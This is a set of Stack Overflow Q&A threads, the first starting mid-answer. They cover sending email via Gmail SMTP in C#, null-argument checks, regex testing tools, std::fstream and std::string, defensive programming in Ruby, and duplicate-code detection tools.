attachment.ContentDisposition; disposition.FileName = AttachmentFileName; disposition.DispositionType = System.Net.Mime.DispositionTypeNames.Attachment; newMsg.Attachments.Add(attachment); } if (test) { smtpClient.PickupDirectoryLocation = "C:\\TestEmail"; smtpClient.DeliveryMethod = System.Net.Mail.SmtpDeliveryMethod.SpecifiedPickupDirectory; } else { //smtpClient.EnableSsl = true; } newMsg.IsBodyHtml = bodyHtml; smtpClient.Send(newMsg); return SENT_OK; } catch (Exception ex) { return "Error: " + ex.Message + "<br/><br/>Inner Exception: " + ex.InnerException; } } And the corresponding section in web.config: <appSettings> <add key="mailCfg" value="[email protected]"/> </appSettings> <system.net> <mailSettings> <smtp deliveryMethod="Network" from="[email protected]"> <network defaultCredentials="false" host="mail.example.com" userName="[email protected]" password="your_password" port="25"/> </smtp> </mailSettings> </system.net> A: Try this one public static bool Send(string receiverEmail, string ReceiverName, string subject, string body) { MailMessage mailMessage = new MailMessage(); MailAddress mailAddress = new MailAddress("[email protected]", "Sender Name"); // [email protected] = input Sender Email Address mailMessage.From = mailAddress; mailAddress = new MailAddress(receiverEmail, ReceiverName); mailMessage.To.Add(mailAddress); mailMessage.Subject = subject; mailMessage.Body = body;
mailMessage.IsBodyHtml = true; SmtpClient mailSender = new SmtpClient("smtp.gmail.com", 587) { EnableSsl = true, UseDefaultCredentials = false, DeliveryMethod = System.Net.Mail.SmtpDeliveryMethod.Network, Credentials = new NetworkCredential("[email protected]", "pass") // [email protected] = input sender email address //pass = sender email password }; try { mailSender.Send(mailMessage); return true; } catch (SmtpFailedRecipientException ex) { // Write the exception to a Log file. } catch (SmtpException ex) { // Write the exception to a Log file. } finally { mailSender = null; mailMessage.Dispose(); } return false; } A: You can try Mailkit. It gives you better and more advanced functionality for sending mail. You can find more from this. Here is an example MimeMessage message = new MimeMessage(); message.From.Add(new MailboxAddress("FromName", "[email protected]")); message.To.Add(new MailboxAddress("ToName", "[email protected]")); message.Subject = "MyEmailSubject"; message.Body = new TextPart("plain") { Text = @"MyEmailBodyOnlyTextPart" }; using (var client = new SmtpClient()) { client.Connect("SERVER", 25); // 25 is port you can change accordingly // Note: since we don't have an OAuth2 token, disable // the XOAUTH2 authentication mechanism. client.AuthenticationMechanisms.Remove("XOAUTH2"); // Note: only needed if the SMTP server requires authentication client.Authenticate("YOUR_USER_NAME", "YOUR_PASSWORD"); client.Send(message); client.Disconnect(true); } A: The above answer doesn't work. You have to set DeliveryMethod = SmtpDeliveryMethod.Network or it will come back with a "client was not authenticated" error. Also it's always a good idea to put a timeout.
Revised code: using System.Net.Mail; using System.Net; var fromAddress = new MailAddress("[email protected]", "From Name"); var toAddress = new MailAddress("[email protected]", "To Name"); const string fromPassword = "password"; const string subject = "test"; const string body = "Hey now!!"; var smtp = new SmtpClient { Host = "smtp.gmail.com", Port = 587, EnableSsl = true, DeliveryMethod = SmtpDeliveryMethod.Network, Credentials = new NetworkCredential(fromAddress.Address, fromPassword), Timeout = 20000 }; using (var message = new MailMessage(fromAddress, toAddress) { Subject = subject, Body = body }) { smtp.Send(message); } A: I hope this code will work fine. You can have a try. // Include this. using System.Net.Mail; string fromAddress = "[email protected]"; string mailPassword = "*****"; // Mail id password from where mail will be sent. string messageBody = "Write the body of the message here."; // Create smtp connection. SmtpClient client = new SmtpClient(); client.Port = 587;//outgoing port for the mail. client.Host = "smtp.gmail.com"; client.EnableSsl = true; client.Timeout = 10000; client.DeliveryMethod = SmtpDeliveryMethod.Network; client.UseDefaultCredentials = false; client.Credentials = new System.Net.NetworkCredential(fromAddress, mailPassword); // Fill the mail form. var send_mail = new MailMessage(); send_mail.IsBodyHtml = true; //address from where mail will be sent. send_mail.From = new MailAddress("[email protected]"); //address to which mail will be sent. send_mail.To.Add(new MailAddress("[email protected]")); //subject of the mail. send_mail.Subject = "put any subject here"; send_mail.Body = messageBody; client.Send(send_mail); A: Edit 2022 Starting May 30, 2022, Google will no longer support the use of third-party apps or devices which ask you to sign in to your Google Account using only your username and password. But you can still send E-Mail via your gmail account. * *Go to https://myaccount.google.com/security and turn on two step verification. Confirm your account by phone if needed. *Click "App Passwords", just below the "2 step verification" tick. *Request a new password for the mail app. Now just use this password instead of the original one for your account! public static void SendMail2Step(string SMTPServer, int SMTP_Port, string From, string Password, string To, string Subject, string Body, string[] FileNames) { var smtpClient = new SmtpClient(SMTPServer, SMTP_Port) { DeliveryMethod = SmtpDeliveryMethod.Network, UseDefaultCredentials = false, EnableSsl = true }; smtpClient.Credentials = new NetworkCredential(From, Password); //Use the new password, generated from google! var message = new System.Net.Mail.MailMessage(new System.Net.Mail.MailAddress(From, "SendMail2Step"), new System.Net.Mail.MailAddress(To, To)); message.Subject = Subject; message.Body = Body; /* set the subject and body from the parameters */ if (FileNames != null) { foreach (var file in FileNames) { message.Attachments.Add(new System.Net.Mail.Attachment(file)); } } /* attach any files passed in */ smtpClient.Send(message); } Use like this: SendMail2Step("smtp.gmail.com", 587, "[email protected]", "yjkjcipfdfkytgqv",//This will be generated by google, copy it here. "[email protected]", "test message subject", "Test message body ...", null); For the other answers to work "from a server" first Turn On Access for less secure apps in the gmail account. This will be deprecated 30 May 2022. Looks like google recently changed its security policy. The top rated answer no longer works, until you change your account settings as described here: https://support.google.com/accounts/answer/6010255?hl=en-GB As of March 2016, google changed the setting location again!
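A note on the samples above: on .NET 4.5 and later, SmtpClient also exposes an awaitable SendMailAsync, which avoids the hand-rolled background thread shown in the first answer. A minimal sketch under the same app-password assumption; the method name and all addresses here are placeholders:

using System.Net;
using System.Net.Mail;
using System.Threading.Tasks;

public static class GmailSender
{
    // Sends one message without blocking the caller.
    // "appPassword" is a Google app password, not the normal account password.
    public static async Task SendAsync(string from, string appPassword,
                                       string to, string subject, string body)
    {
        using (var smtp = new SmtpClient("smtp.gmail.com", 587))
        {
            smtp.EnableSsl = true;
            smtp.DeliveryMethod = SmtpDeliveryMethod.Network;
            smtp.UseDefaultCredentials = false;
            smtp.Credentials = new NetworkCredential(from, appPassword);
            using (var message = new MailMessage(from, to, subject, body))
            {
                await smtp.SendMailAsync(message); // awaitable, no manual Thread needed
            }
        }
    }
}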
A: Source : Send email in ASP.NET C# Below is a sample working code for sending a mail using C#; in the below example I am using google’s smtp server. The code is pretty self explanatory, replace email and password with your email and password values. public void SendEmail(string address, string subject, string message) { string email = "[email protected]"; string password = "put-your-GMAIL-password-here"; var loginInfo = new NetworkCredential(email, password); var msg = new MailMessage(); var smtpClient = new SmtpClient("smtp.gmail.com", 587); msg.From = new MailAddress(email); msg.To.Add(new MailAddress(address)); msg.Subject = subject; msg.Body = message; msg.IsBodyHtml = true; smtpClient.EnableSsl = true; smtpClient.UseDefaultCredentials = false; smtpClient.Credentials = loginInfo; smtpClient.Send(msg); } A: To avoid security issues in Gmail, you should generate an app password first from your Gmail settings and you can use this password instead of a real password to send an email, even if you use two-step verification. A: Be sure to use System.Net.Mail, not the deprecated System.Web.Mail. Doing SSL with System.Web.Mail is a gross mess of hacky extensions. using System.Net; using System.Net.Mail; var fromAddress = new MailAddress("[email protected]", "From Name"); var toAddress = new MailAddress("[email protected]", "To Name"); const string fromPassword = "fromPassword"; const string subject = "Subject"; const string body = "Body"; var smtp = new SmtpClient { Host = "smtp.gmail.com", Port = 587, EnableSsl = true, DeliveryMethod = SmtpDeliveryMethod.Network, UseDefaultCredentials = false, Credentials = new NetworkCredential(fromAddress.Address, fromPassword) }; using (var message = new MailMessage(fromAddress, toAddress) { Subject = subject, Body = body }) { smtp.Send(message); } Additionally go to the Google Account > Security page and look at the Signing in to Google > 2-Step Verification setting. * *If it is enabled, then you have to generate a password allowing .NET to bypass the 2-Step Verification. To do this, click on Signing in to Google > App passwords, select app = Mail, and device = Windows Computer, and finally generate the password. Use the generated password in the fromPassword constant instead of your standard Gmail password. *If it is disabled, then you have to turn on Less secure app access, which is not recommended! So better enable the 2-Step verification. A: Include this, using System.Net.Mail; And then, MailMessage sendmsg = new MailMessage(SendersAddress, ReceiversAddress, subject, body); SmtpClient client = new SmtpClient("smtp.gmail.com"); client.Port = 587; client.Credentials = new System.Net.NetworkCredential("[email protected]","password"); client.EnableSsl = true; client.Send(sendmsg); A: Copying from another answer, the above methods work but gmail always replaces the "from" and "reply to" email with the actual sending gmail account. Apparently there is a workaround, however: http://karmic-development.blogspot.in/2013/10/send-email-from-aspnet-using-gmail-as.html "3. In the Accounts Tab, Click on the link "Add another email address you own" then verify it" Or possibly this Update 3: Reader Derek Bennett says, "The solution is to go into your gmail Settings:Accounts and "Make default" an account other than your gmail account. This will cause gmail to re-write the From field with whatever the default account's email address is." A: This is no longer supported in case you are trying to do this now.
https://support.google.com/accounts/answer/6010255?hl=en&visit_id=637960864118404117-800836189&p=less-secure-apps&rd=1#zippy= A: If your Google password doesn't work, you may need to create an app-specific password for Gmail on Google. https://support.google.com/accounts/answer/185833?hl=en
{ "language": "en", "url": "https://stackoverflow.com/questions/32260", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "951" }
Q: Passing null to a method I am in the middle of reading the excellent Clean Code. One discussion regards passing nulls into a method. public class MetricsCalculator { public double xProjection(Point p1, Point p2) { return (p2.x - p1.x) * 1.5; } } ... calculator.xProjection(null, new Point(12,13)); It presents different ways of handling this: public double xProjection(Point p1, Point p2) { if (p1 == null || p2 == null) { throw new IllegalArgumentException("Invalid argument for xProjection"); } return (p2.x - p1.x) * 1.5; } public double xProjection(Point p1, Point p2) { assert p1 != null : "p1 should not be null"; assert p2 != null : "p2 should not be null"; return (p2.x - p1.x) * 1.5; } I prefer the assertions approach, but I don't like the fact that assertions are turned off by default. The book finally states: In most programming languages there is no good way to deal with a null that is passed by a caller accidentally. Because this is the case, the rational approach is to forbid passing null by default. It doesn't really go into how you would enforce this restriction. Do any of you have strong opinions either way? A: The general rule is that if your method doesn't expect null arguments, you should throw a System.ArgumentNullException. Throwing the proper exception not only protects you from resource corruption and other bad things but serves as a guide for users of your code, saving time spent debugging your code. Also read an article on Defensive programming A: Also not of immediate use, but related to the mention of Spec#... There's a proposal to add "null-safe types" to a future version of Java: "Enhanced null handling - Null-safe types". Under the proposal, your method would become public class MetricsCalculator { public double xProjection(#Point p1, #Point p2) { return (p2.x - p1.x) * 1.5; } } where #Point is the type of non-null references to objects of type Point. A: Both the use of assertions and the throwing of exceptions are valid approaches here. Either mechanism can be used to indicate a programming error, not a runtime error, as is the case here. * *Assertions have the advantage of performance as they are typically disabled on production systems. *Exceptions have the advantage of safety, as the check is always performed. The choice really depends on the development practices of the project. The project as a whole needs to decide on an assertion policy: if the choice is to enable assertions during all development, then I'd say to use assertions to check this kind of invalid parameter - in a production system, a NullPointerException thrown due to a programming error is unlikely to be able to be caught and handled in a meaningful way anyway and so will act just like an assertion. Practically though, I know a lot of developers that don't trust that assertions will be enabled when appropriate and so opt for the safety of throwing a NullPointerException. Of course if you can't enforce a policy for your code (if you're creating a library, for example, and so are dependent on how other developers run your code), you should opt for the safe approach of throwing NullPointerException for those methods that are part of the library's API. A: It doesn't really go into how you would enforce this restriction? You enforce it by throwing an ArgumentException if they pass in null. if (p1 == null || p2 == null) { throw new IllegalArgumentException("Invalid argument for xProjection"); } A: Spec# looks very interesting!
When something like that isn't available, I generally test non-private methods with a run-time null-check, and assertions for internal methods. Rather than code the null check explicitly in each method, I delegate that to a utilities class with a check null method: /** * Checks to see if an object is null, and if so * generates an IllegalArgumentException with a fitting message. * * @param o The object to check against null. * @param name The name of the object, used to format the exception message * * @throws IllegalArgumentException if o is null. */ public static void checkNull(Object o, String name) throws IllegalArgumentException { if (null == o) throw new IllegalArgumentException(name + " must not be null"); } public static void checkNull(Object o) throws IllegalArgumentException { checkNull(o, "object"); } // untested: public static void checkNull(Object... os) throws IllegalArgumentException { for(Object o : os) checkNull(o); } Then checking turns into: public void someFun(String val1, String val2) throws IllegalArgumentException { ExceptionUtilities.checkNull(val1, "val1"); ExceptionUtilities.checkNull(val2, "val2"); /** alternatively: ExceptionUtilities.checkNull(val1, val2); **/ /** ... **/ } That can be added with editor macros, or a code-processing script. Edit: The verbose check could be added this way as well, but I think it's significantly easier to automate the addition of a single line. A: In most programming languages there is no good way to deal with a null that is passed by a caller accidentally. Because this is the case, the rational approach is to forbid passing null by default. I found JetBrains' @Nullable and @NotNull annotations approach for dealing with this the most ingenious, so far. It's IDE specific, unfortunately, but really clean and powerful, IMO. http://www.jetbrains.com/idea/documentation/howto.html Having this (or something similar) as a Java standard would be really nice. A: I prefer the use of assertions. I have a rule that I only use assertions in public and protected methods. This is because I believe the calling method should ensure that it is passing valid arguments to private methods. A: I generally prefer not doing either, since it's just slowing things down. NullPointerExceptions are thrown later on anyway, which will quickly lead the user to discovering they're passing null to the method. I used to check, but 40% of my code ended up being checking code, at which point I decided it was just not worth the nice assertion messages. A: I agree or disagree with wvdschel's post, it depends on what he's specifically saying. In this case, sure, this method will crash on null so the explicit check here is probably not needed. However, if the method simply stores the passed data, and there is some other method that you call later that will deal with it, discovering bad input as early as possible is the key to fixing bugs faster. At that later point, there could be a myriad of ways that bad data happened to be given to your class. It's sort of trying to figure out how the rats came into your house after the fact, trying to find the hole somewhere. A: @Chris Karcher I would say absolutely correct. The only thing I would say is check the params separately and have the exception report the param that was null also, as it makes tracking where the null is coming from much easier. @wvdschel wow!
If writing the code is too much effort for you, you should look into something like PostSharp (or a Java equivalent if one is available) which can post-process your assemblies and insert param checks for you. A: Although it is not strictly related you might want to take a look at Spec#. I think it is still in development (by Microsoft) but some CTPs are available and it looks promising. Basically it allows you to do this: public static int Divide(int x, int y) requires y != 0 otherwise ArgumentException; { } or public static int Subtract(int x, int y) requires x > y; ensures result > y; { return x - y; } It also provides other features like NotNull types. It's built on top of the .NET Framework 2.0 and it's fully compatible. The syntax, as you may see, is C#. A: Slightly off-topic, but one feature of findbugs that I think is very useful is to be able to annotate the parameters of methods to describe which parameters should not be passed a null value. Using static analysis of your code, findbugs can then point out locations where the method is called with a potentially null value. This has two advantages: * *The annotation describes your intention for how the method should be called, aiding documentation *FindBugs can point to potential problem callers of the method, allowing you to track down potential bugs. Only useful when you have access to the code that calls your methods, but that is usually the case. A: Since off-topic seems to have become the topic, Scala takes an interesting approach to this. All types are assumed to be not null, unless you explicitly wrap them in an Option to indicate that they might be null. So: // allocate null var name : Option[String] name = None // allocate a value name = Any["Hello"] // print the value if we can name match { Any[x] => print x _ => print "Nothing at all" } A: Throwing C# ArgumentException, or Java IllegalArgumentException right at the beginning of the method looks to me as the clearest of solutions. One should always be careful with Runtime Exceptions - exceptions that are not declared on the method signature. Since the compiler doesn't force you to catch these it's really easy to forget about them. Make sure you have some kind of a "catch all" exception handler to prevent the software from halting abruptly. That's the most important part of your user experience. A: The best way to handle this really would be the use of exceptions. Ultimately, the asserts are going to end up giving a similar experience to the end user but provide no way for the developer calling your code to handle the situation before showing an exception to the end user. Ultimately, you want to ensure that you test for invalid inputs as early as possible (especially in public facing code) and provide the appropriate exceptions that the calling code can catch. A: In a Java way, assuming the null comes from a programming error (i.e. should never make it past the testing phase), then let the system throw it, or if there are side-effects reaching that point, check for null at the beginning and throw either IllegalArgumentException or NullPointerException. If the null could come from an actual exceptional case but you don't want to use a checked exception for that, then you definitely want to go the IllegalArgumentException route at the beginning of the method.
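To make the guard-clause consensus above concrete: since Java 7, java.util.Objects.requireNonNull gives you the one-line check several answers describe (note it throws NullPointerException rather than IllegalArgumentException). A minimal sketch of the book's example using it; this is just an illustration, not the book's own code, and Point is the question's class:

import java.util.Objects;

public class MetricsCalculator {
    public double xProjection(Point p1, Point p2) {
        // Fails fast with a clear message naming the offending parameter.
        Objects.requireNonNull(p1, "p1 must not be null");
        Objects.requireNonNull(p2, "p2 must not be null");
        return (p2.x - p1.x) * 1.5;
    }
}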
{ "language": "en", "url": "https://stackoverflow.com/questions/32280", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "20" }
Q: How can I test regular expressions using multiple RE engines? How can I test the same regex against different regular expression engines? A: Here are some for the Mac: (Note: don't judge the tools by their websites) * *RegExhibit - My Favorite, powerful and easy *Reggy - Simple and Clean *RegexWidget - A Dashboard Widget for quick testing A: If you are an Emacs user, the command re-builder lets you type an Emacs regex and shows on the fly the matching strings in the current buffer, with colors to mark groups. It's free as Emacs. A: The most powerful free online regexp testing tool is by far http://regex101.com/ - lets you select the RE engine (PCRE, JavaScript, Python), has a debugger, colorizes the matches, explains the regexp on the fly, can create permalinks to the regex playground. Other online tools: * *http://www.rexv.org/ - supports PHP and Perl PCRE, Posix, Python, JavaScript, and Node.js *http://refiddle.com/ - Inspired by jsfiddle, but for regular expressions. Supports JavaScript, Ruby and .NET expressions. *http://regexpal.com/ - powered by the XRegExp JavaScript library *http://www.rubular.com/ - Ruby-based *Perl Regex Tutor - uses PCRE Windows desktop tools: * *The Regex Coach - free Windows application *RegexBuddy recommended by most, costs US$ 39.95 Jeff Atwood wrote about regular expressions. Other tools recommended by SO users include: * *http://www.txt2re.com/ Online free tool to generate regular expressions for multiple languages (@palmsey another thread) *The Added Bytes Regular Expressions Cheat Sheet (@GateKiller another thread) *http://regexhero.net/ - The Online .NET Regular Expression Tester. Not free. A: Rubular is free, easy to use and looks nice. A: RegexBuddy is a weapon of choice A: I use the excellent and free Rad Software Regular Expression Designer. If you just want to write a regular expression, have a little help with the syntax and test the RE's matching and replacing then this fairly light-footprint tool is ideal. A: couple of eclipse plugins for those using eclipse, http://www.brosinski.com/regex/ http://www.bastian-bergerhoff.com/eclipse/features/web/QuickREx/toc.html A: Kodos of course. Cause it's Pythonic. ;) A: RegexBuddy is great!!! A: I agree on RegExBuddy, but if you want free or when I'm working somewhere and not on my own system RegExr is a great online (Flash) tool that has lots of pre-built regex segments to work with and does real-time pattern matching for your testing. A: In the standard Python installation there is a "Tools/scripts" directory containing redemo.py. This creates an interactive Tkinter window in which you can experiment with regexs. A: In the past I preferred The Regex Coach for its simplistic layout, instantaneous highlighting and its price (free). Every once in awhile though I run into an issue with it when trying to test .NET regular expressions. For that, it turns out, it's better to use a tool that actually uses the .NET regular expression engine. That was my whole reason to build Regex Hero last year. It runs in Silverlight, and as such, runs off of the .NET Regex Class library directly. A: RegexBuddy A: I use Expresso (www.ultrapico.com). It has a lot of nice features for the developer. The Regulator used to be my favorite, but it hasn't been updated in so long and I constantly ran into crashes with complicated RegExs. A: Regexbuddy does all this.
http://www.regexbuddy.com/ A: see the accepted answer to this question: Learning Regular Expressions A: I'll add to the vote of Reggy for the Mac, gonna try out some of the other ones that Joseph suggested and upvote that post tomorrow when my limit gets reset. A: for online: http://regexpal.com/ for desktop: The Regex Coach A: +1 For Regex Coach here. Free and does the job really well. http://www.weitz.de/regex-coach/ A: I am still a big fan of The Regulator. There are some stability problems but these can be fixed by disabling the Intellisense. It gets mad with some expressions and typos in building an expression. Would love it if Roy Osherove updated, but looks like he is busy with other things. A: I like to use this online one: http://www.cuneytyilmaz.com/prog/jrx/ Of course, it'll be javascript regexp, but I've never yet done anything clever enough to notice the difference. A: How much is your time worth? Pay the $40 and get RegexBuddy. I did, and I even upgraded from 2.x version to 3.x. It has paid for itself many times over. A: I personally like the Regular Expression Tester. It's a free firefox plugin, so always on! A: Also this regex plugin can be useful for eclipse and idea users. A: I like http://regexhero.net/tester/ a lot A: Check out Regex Master, a free and open source regular expression tester A: This regex tester is able to test javascript, php and python http://www.piliapp.com/regex-tester/ A: RegExBuddy so far I concur with and endorse. A: RegExr for testing with the Actionscript 3 (whichever standard that may be) A: http://rgx-extract-replace.appspot.com has the functionality to enlist the captured regex groups formatted in columns and optionally can replace the matched patterns in the input text.
{ "language": "en", "url": "https://stackoverflow.com/questions/32282", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "85" }
Q: Why don't the std::fstream classes take a std::string? This isn't a design question, really, though it may seem like it. (Well, okay, it's kind of a design question). What I'm wondering is why the C++ std::fstream classes don't take a std::string in their constructor or open methods. Everyone loves code examples so: #include <iostream> #include <fstream> #include <string> int main() { std::string filename = "testfile"; std::ifstream fin; fin.open(filename.c_str()); // Works just fine. fin.close(); //fin.open(filename); // Error: no such method. //fin.close(); } This gets me all the time when working with files. Surely the C++ library would use std::string wherever possible? A: The stream IO library was added to the standard C++ library before the STL. In order to not break backward compatibility, it was decided to avoid modifying the IO library when the STL was added, even if that meant some issues like the one you raise. A: @ Bernard: Monoliths "Unstrung." "All for one, and one for all" may work for Musketeers, but it doesn't work nearly as well for class designers. Here's an example that is not altogether exemplary, and it illustrates just how badly you can go wrong when design turns into overdesign. The example is, unfortunately, taken from a standard library near you... ~ http://www.gotw.ca/gotw/084.htm A: By taking a C string the C++03 std::fstream class reduced dependency on the std::string class. In C++11, however, the std::fstream class does allow passing a std::string for its constructor parameter. Now, you may wonder why isn't there a transparent conversion from a std::string to a C string, so a class that expects a C string could still take a std::string just like a class that expects a std::string can take a C string. The reason is that this would cause a conversion cycle, which in turn may lead to problems. For example, suppose std::string would be convertible to a C string so that you could use std::strings with fstreams. Suppose also that C strings are convertible to std::strings, as is the state in the current standard. Now, consider the following: void f(std::string str1, std::string str2); void f(char* cstr1, char* cstr2); void g() { char* cstr = "abc"; std::string str = "def"; f(cstr, str); // ERROR: ambiguous } Because you can convert either way between a std::string and a C string the call to f() could resolve to either of the two f() alternatives, and is thus ambiguous. The solution is to break the conversion cycle by making one conversion direction explicit, which is what the STL chose to do with c_str().
For example, basic_string includes methods that are unnecessary duplicates of standard algorithms; the various find methods could probably be safely removed. Another example: locales use raw pointers instead of iterators. A: There are several places where the C++ standard committee did not really optimize the interaction between facilities in the standard library. std::string and its use in the library is one of these. One other example is std::swap. Many containers have a swap member function, but no overload of std::swap is supplied. The same goes for std::sort. I hope all these small things will be fixed in the upcoming standard. A: Maybe it's a consolation: all fstreams have gotten an open(string const &, ...) next to the open(char const *, ...) in the working draft of the C++0x standard. (see e.g. 27.8.1.6 for the basic_ifstream declaration) So when it gets finalised and implemented, it won't get you anymore :) A: C++ grew up on smaller machines than the monsters we write code for today. Back when iostream was new many developers really cared about code size (they had to fit their entire program and data into several hundred KB). Therefore, many didn't want to pull in the "big" C++ string library. Many didn't even use the iostream library for the same reasons, code size. We didn't have thousands of megabytes of RAM to throw around like we do today. We usually didn't have function level linking so we were at the mercy of the developer of the library to use a lot of separate object files or else pull in tons of uncalled code. All of this FUD made developers steer away from std::string. Back then I avoided std::string too. "Too bloated", "called malloc too often", etc. Foolishly using stack-based buffers for strings, then adding all kinds of tedious code to make sure it doesn't overrun. A: Is there any class in STL that takes a string... I don't think so (couldn't find any in my quick search). So it's probably a design decision that no class in STL should depend on any other STL class (that is not directly needed for its functionality). A: I believe that this has been thought about and was done to avoid the dependency; i.e. #include <fstream> should not force one to #include <string>. To be honest, this seems like quite an inconsequential issue. A better question would be, why is std::string's interface so large? A: Nowadays you can solve this problem very easily: add -std=c++11 to your CFLAGS.
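With that flag the std::string overloads mentioned above are available, and the example from the question compiles as-is. A minimal sketch (requires a C++11 or later compiler):

#include <fstream>
#include <string>

int main() {
    std::string filename = "testfile";
    std::ifstream fin(filename);   // C++11: constructor takes std::string directly
    fin.close();
    fin.open(filename);            // C++11: open() takes std::string too
}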
{ "language": "en", "url": "https://stackoverflow.com/questions/32332", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "36" }
Q: How can I program defensively in Ruby? Here's a perfect example of the problem: Classifier gem breaks Rails. ** Original question: ** One thing that concerns me as a security professional is that Ruby doesn't have a parallel of Java's package-privacy. That is, this isn't valid Ruby: public module Foo public module Bar # factory method for new Bar implementations def self.new(...) SimpleBarImplementation.new(...) end def baz raise NotImplementedError.new('Implementing Classes MUST redefine #baz') end end private class SimpleBarImplementation include Bar def baz ... end end end It'd be really nice to be able to prevent monkey-patching of Foo::BarImpl. That way, people who rely on the library know that nobody has messed with it. Imagine if somebody changed the implementation of MD5 or SHA1 on you! I can call freeze on these classes, but I have to do it on a class-by-class basis, and other scripts might modify them before I finish securing my application if I'm not very careful about load order. Java provides lots of other tools for defensive programming, many of which are not possible in Ruby. (See Josh Bloch's book for a good list.) Is this really a concern? Should I just stop complaining and use Ruby for lightweight things and not hope for "enterprise-ready" solutions? (And no, core classes are not frozen by default in Ruby. See below:) require 'md5' # => true MD5.frozen? # => false A: I don't think this is a concern. Yes, the mythical "somebody" can replace the implementation of MD5 with something insecure. But in order to do that, the mythical somebody must actually be able to get his code into the Ruby process. And if he can do that, then he presumably could also inject his code into a Java process and e.g. rewrite the bytecode for the MD5 operation. Or just intercept the keypresses and not actually bother with fiddling with the cryptography code at all. One of the typical concerns is: I'm writing this awesome library, which is supposed to be used like so: require 'awesome' # Do something awesome. But what if someone uses it like so: require 'evil_cracker_lib_from_russian_pr0n_site' # Overrides crypto functions and sends all data to mafia require 'awesome' # Now everything is insecure because awesome lib uses # cracker lib instead of builtin And the simple solution is: don't do that! Educate your users that they shouldn't run untrusted code they downloaded from obscure sources in their security critical applications. And if they do, they probably deserve it. To come back to your Java example: it's true that in Java you can make your crypto code private and final and what not. However, someone can still replace your crypto implementation! In fact, someone actually did: many open-source Java implementations use OpenSSL to implement their cryptographic routines. And, as you probably know, Debian shipped with a broken, insecure version of OpenSSL for years. So, all Java programs running on Debian for the past couple of years actually did run with insecure crypto! A: Java provides lots of other tools for defensive programming Initially I thought you were talking about normal defensive programming, wherein the idea is to defend the program (or your subset of it, or your single function) from invalid data input. That's a great thing, and I encourage everyone to go read that article. However it seems you are actually talking about "defending your code from other programmers." 
In my opinion, this is a completely pointless goal, as no matter what you do, a malicious programmer can always run your program under a debugger, or use dll injection or any number of other techniques. If you are merely seeking to protect your code from incompetent co-workers, this is ridiculous. Educate your co-workers, or get better co-workers. At any rate, if such things are of great concern to you, ruby is not the programming language for you. Monkeypatching is in there by design, and to disallow it goes against the whole point of the feature. A: I guess Ruby has that as a feature - it's valued more highly than the security concern. Ducktyping too. E.g. I can add my own methods to the Ruby String class rather than extending or wrapping it. A: "Educate your co-workers, or get better co-workers" works great for a small software startup, and it works great for the big guns like Google and Amazon. It's ridiculous to expect that kind of rigor from every lowly developer contracted in for some small medical charts application in a doctor's office in a minor city. I'm not saying we should build for the lowest common denominator, but we have to be realistic that there are lots of mediocre programmers out there who will pull in any library that gets the job done, paying no attention to security. How could they pay attention to security? Maybe they took an algorithms and data structures class. Maybe they took a compilers class. They almost certainly didn't take an encryption protocols class. They definitely haven't all read Schneier or any of the others out there who practically have to beg and plead with even very good programmers to consider security when building software. I'm not worried about this: require 'evil_cracker_lib_from_russian_pr0n_site' require 'awesome' I'm worried about awesome requiring foobar and fazbot, and foobar requiring has_gumption, and ... eventually two of these conflict in some obscure way that undoes an important security aspect. One important security principle is "defense in depth" -- adding these extra layers of security helps keep you from accidentally shooting yourself in the foot. They can't completely prevent it; nothing can. But they help. A: Check out Immutable by Garry Dolley. You can prevent redefinition of individual methods. A: If monkey patching is your concern, you can use the Immutable module (or one of similar function). Immutable A: You could take a look at Why the Lucky Stiff's "Sandbox" project, which you can use if you worry about potentially running unsafe code. http://code.whytheluckystiff.net/sandbox/ An example (online TicTacToe): http://www.elctech.com/blog/safely-exposing-your-app-to-a-ruby-sandbox A: Raganwald has a recent post about this. In the end, he builds the following: class Module def anonymous_module(&block) self.send :include, Module.new(&block) end end class Acronym anonymous_module do fu = lambda { 'fu' } bar = lambda { 'bar' } define_method :fubar do fu.call + bar.call end end end That exposes fubar as a public method on Acronyms, but keeps the internal guts (fu and bar) private and hides the helper module from outside view. A: If someone monkeypatched an object or a module, then you need to look at 2 cases: He added a new method. If he is the only one adding this method (which is very likely), then no problems arise. If he is not the only one, you need to see if both methods do the same and tell the library developer about this severe problem. If they change a method, you should start to research why the method was changed.
Did they change it due to some edge case behaviour or did they actually fix a bug? Especially in the latter case, the monkeypatch is a good thing, because it fixes a bug in many places. Besides that, you are using a very dynamic language with the assumption that programmers use this freedom in a sane way. The only way to remove this assumption is not to use a dynamic language.
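As a concrete illustration of the freeze approach from the question — a minimal sketch; the use of Digest::MD5 here is just an example, and the exact exception class and message vary by Ruby version (FrozenError on newer Rubies, RuntimeError on older ones):

require 'digest/md5'

Digest::MD5.freeze            # lock the class against later modification

begin
  class Digest::MD5           # a later attempt to monkey-patch it...
    def digest; 'tampered'; end
  end
rescue => e
  puts "blocked: #{e.class}"  # ...raises, e.g. "can't modify frozen class"
end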
{ "language": "en", "url": "https://stackoverflow.com/questions/32333", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "5" }
Q: Are there similar tools to Clone Detective for other languages/IDEs? I just saw Clone Detective linked on YCombinator news, and the idea heavily appeals to me. It seems like it would be useful for many languages, not just C#, but I haven't seen anything similar elsewhere. Edit: For those who don't want to follow the link, Clone Detective scans the codebase for duplicate code that may warrant refactoring to minimize duplication. A: Java has a few - some of the most popular static analysis tools have this built in along with many other useful rules. Ones I have used, in the (purely subjective) order that I was happiest with: * *PMD - comes with CPD - their copy and paste detector *Checkstyle - specific rules to look for duplicate code *Findbugs - the daddy of all Java static analysis tools. Includes duplicate code detection, along with just about anything else that you can think of, but quite resource intensive There are some nice IDE plugins for all of these and many other reporting tools (for example, you can see results on a Hudson continuous build server, or your project's Maven site) A: The IntelliJ IDE (Java, Scala, Ruby,...) has a Locate Duplicate... tool. Useful indeed!
{ "language": "en", "url": "https://stackoverflow.com/questions/32338", "timestamp": "2023-03-29T00:00:00", "source": "stackexchange", "question_score": "4" }
